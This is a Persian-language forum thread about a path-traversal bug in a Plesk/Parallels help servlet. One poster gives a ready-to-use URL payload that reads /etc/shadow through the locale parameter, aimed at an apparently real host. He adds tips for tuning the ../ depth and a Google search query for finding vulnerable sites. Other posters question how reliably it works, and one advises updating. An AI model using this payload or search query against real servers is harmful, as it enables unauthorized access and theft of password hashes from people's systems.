معرفی باگ خطرناک در Plesk

[Masoud.B]

دوستان این باگ رو من مدتیه میدونم خواستم بهتون معرفی کنم تا مواظب باشید

کافیه بعد از صفحه لوگین (https://www.cp.ewdx.com/single.html)

این را اضافه کنید: servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00

مثال :

کد:

https://www.cp.ewdx.com/servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00

میبینید که پسورد hash شده روت رو نشون میده

هدف فقط اطلاع رسانی بود

منبع: Ashiyane

[TukaNet]

روی پلسک 9 ویندوزی که کار نکرد !

[Masoud.B]

روی پلسک 9 ویندوزی که کار نکرد !

با یکم کم و زیاد کردن ../ کار میکنه البته درسته همش نمیشه ، تو گوگل اینو سرچ کنید کلی ازین سایت ها میاد که باگ داره : intitle:Parallels® Automation inurl:https://cp

[Arashdn]

پلسک خیلی به امنیتش افتخار میکرد
چطور شد چنین باگ هایی رو پیدا کردین؟
کسی خودش تست کرده رو پلسک؟؟

[Veria]

روی بعضی ورژن ها بعضی وقتها جواب میده (بیشتر وقتها ارور میده) اما خروجی هم به این سادگی ها قابل استفاده نیست.
به هر حال بهتره آپدیت کنید.